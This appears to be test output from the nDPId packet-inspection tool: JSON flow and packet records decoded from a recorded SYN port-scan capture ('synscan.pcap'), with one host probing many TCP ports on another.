-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"synscan.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15660,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"synscan.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsRG4AADsGyQSsEAAIQA2GNIzTPSzdU4MZAAAAAGACEADrXwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"synscan.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"synscan.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsZD8AADMGsTOsEAAIQA2GNIzTNrDdU4MZAAAAAGACEADx2wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"synscan.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"synscan.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsqbQAADoGZL6sEAAIQA2GNIzTJRzdU4MZAAAAAGACDAAHcAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"synscan.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":425,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"synscan.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsdUEAADIGoTGsEAAIQA2GNIzTAandU4MZAAAAAGACDAAq4wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAssN0AACoGbZWsEAAIQA2GNIzTF0fdU4MZAAAAAGACDAAVRQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsrmsAACwGbgesEAAIQA2GNIzSHUjdUoMYAAAAAGACBAAXRwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"synscan.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"synscan.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAs2\/QAADYGNn6sEAAIQA2GNIzSBC\/dUoMYAAAAAGACDAAoYAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"synscan.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"synscan.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsEvoAADIGA3msEAAIQA2GNIzSd\/7dUoMYAAAAAGACDAC0kAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"synscan.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"synscan.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsK3gAADkG4\/qsEAAIQA2GNIzSAyjdUoMYAAAAAGACCAAtZwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"synscan.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"synscan.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsU\/gAACsGyXqsEAAIQA2GNIzSGY\/dUoMYAAAAAGACEAAPAAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"synscan.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"synscan.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsr1oAADIGZxisEAAIQA2GNIzSC\/\/dUoMYAAAAAGACDAAgkAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"synscan.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"synscan.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAs4hsAACUGQVesEAAIQA2GNIzSE6ndUoMYAAAAAGACCAAc5gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"synscan.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"synscan.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsyIQAACkGVu6sEAAIQA2GNIzSBEfdUoMYAAAAAGACCAAsSAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":220,"source":"synscan.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1064,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"synscan.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsROwAADEG0oasEAAIQA2GNIzSBCjdUoMYAAAAAGACCAAsZwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"synscan.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"synscan.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsBKEAACYGHdKsEAAIQA2GNIzSBFfdUoMYAAAAAGACDAAoOAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"synscan.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"synscan.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsbn0AACgGsfWsEAAIQA2GNIzSIcndUoMYAAAAAGACBAASxgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"synscan.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"synscan.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAskbgAACwGirqsEAAIQA2GNIzSCDPdUoMYAAAAAGACBAAsXAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"synscan.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":765,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"synscan.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsrooAADsGXuisEAAIQA2GNIzSAv3dUoMYAAAAAGACEAAlkgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"synscan.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"synscan.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAs9kUAADAGIi2sEAAIQA2GNIzSIzLdUoMYAAAAAGACBAARXQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"synscan.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"synscan.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsPSYAADMG2EysEAAIQA2GNIzSI2\/dUoMYAAAAAGACEAAFIAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"synscan.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"synscan.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsda8AACkGqcOsEAAIQA2GNIzTwAPdU4MZAAAAAGACCABwiAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsQxYAADYGz1ysEAAIQA2GNIzTCI7dU4MZAAAAAGACDAAj\/gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"synscan.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"synscan.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsrvQAADUGZH6sEAAIQA2GNIzTC7ndU4MZAAAAAGACCAAk0wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsMq8AACsG6sOsEAAIQA2GNIzTGbTdU4MZAAAAAGACEAAO2AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"synscan.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1583,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 